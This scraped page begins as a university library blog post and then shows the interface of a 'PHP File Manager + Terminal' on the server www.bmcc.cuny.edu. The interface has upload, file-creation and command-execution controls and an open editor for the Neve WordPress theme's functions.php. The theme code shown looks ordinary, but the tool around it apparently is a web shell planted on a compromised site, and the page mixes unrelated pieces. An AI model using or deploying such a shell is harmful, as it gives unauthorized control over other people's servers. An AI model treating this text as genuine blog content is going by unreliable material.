Looking for something? Use OneSearch! Posted on January 23, 2020 (February 3, 2025) by Rebecca Hyams PHP File Manager + Terminal PHP File Manager + TerminalServer: www.bmcc.cuny.eduSoftware: Apache/2.4.62 (Debian)Current directory: //var/www/html/sfac/wp-content/themes/neve Upload Create File Create Folder Execute Editing: /var/www/html/sfac/wp-content/themes/neve/functions.php<?php /** * Neve functions.php file * * Author: Andrei Baicus <andrei@themeisle.com> * Created on: 17/08/2018 * * @package Neve */ define( 'NEVE_VERSION', '2.5.2' ); define( 'NEVE_INC_DIR', trailingslashit( get_template_directory() ) . 'inc/' ); define( 'NEVE_ASSETS_URL', trailingslashit( get_template_directory_uri() ) . 'assets/' ); if ( ! defined( 'NEVE_DEBUG' ) ) { define( 'NEVE_DEBUG', false ); } add_filter( 'neve_the_content', 'do_blocks' ); add_filter( 'neve_the_content', 'wptexturize' ); add_filter( 'neve_the_content', 'convert_smilies' ); add_filter( 'neve_the_content', 'convert_chars' ); add_filter( 'neve_the_content', 'wpautop' ); add_filter( 'neve_the_content', 'shortcode_unautop' ); add_filter( 'neve_the_content', 'do_shortcode' ); /** * Themeisle SDK filter. * * @param array $products products array. * * @return array */ function neve_filter_sdk( $products ) { $products[] = get_template_directory() . '/style.css'; return $products; } add_filter( 'themeisle_sdk_products', 'neve_filter_sdk' ); add_filter( 'themeisle_onboarding_phprequired_text', 'neve_get_php_notice_text' ); /** * Get php version notice text. * * @return string */ function neve_get_php_notice_text() { $message = sprintf( /* translators: %s message to upgrade PHP to the latest version */ __( "Hey, we've noticed that you're running an outdated version of PHP which is no longer supported. Make sure your site is fast and secure, by %s. Neve's minimal requirement is PHP 5.4.0.", 'neve' ), sprintf( /* translators: %s message to upgrade PHP to the latest version */ '<a href="https://wordpress.org/support/upgrade-php/">%s</a>', __( 'upgrading PHP to the latest version', 'neve' ) ) ); return wp_kses_post( $message ); } /** * Adds notice for PHP < 5.3.29 hosts. */ function neve_php_support() { printf( '<div class="error"><p>%1$s</p></div>', neve_get_php_notice_text() ); // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped } if ( version_compare( PHP_VERSION, '5.3.29' ) <= 0 ) { /** * Add notice for PHP upgrade. */ add_filter( 'template_include', '__return_null', 99 ); switch_theme( WP_DEFAULT_THEME ); unset( $_GET['activated'] ); add_action( 'admin_notices', 'neve_php_support' ); return; } require_once get_template_directory() . '/start.php'; require_once 'globals/utilities.php'; require_once 'globals/hooks.php'; require_once 'globals/sanitize-functions.php'; require_once 'globals/migrations.php'; require_once get_template_directory() . '/header-footer-grid/loader.php'; Save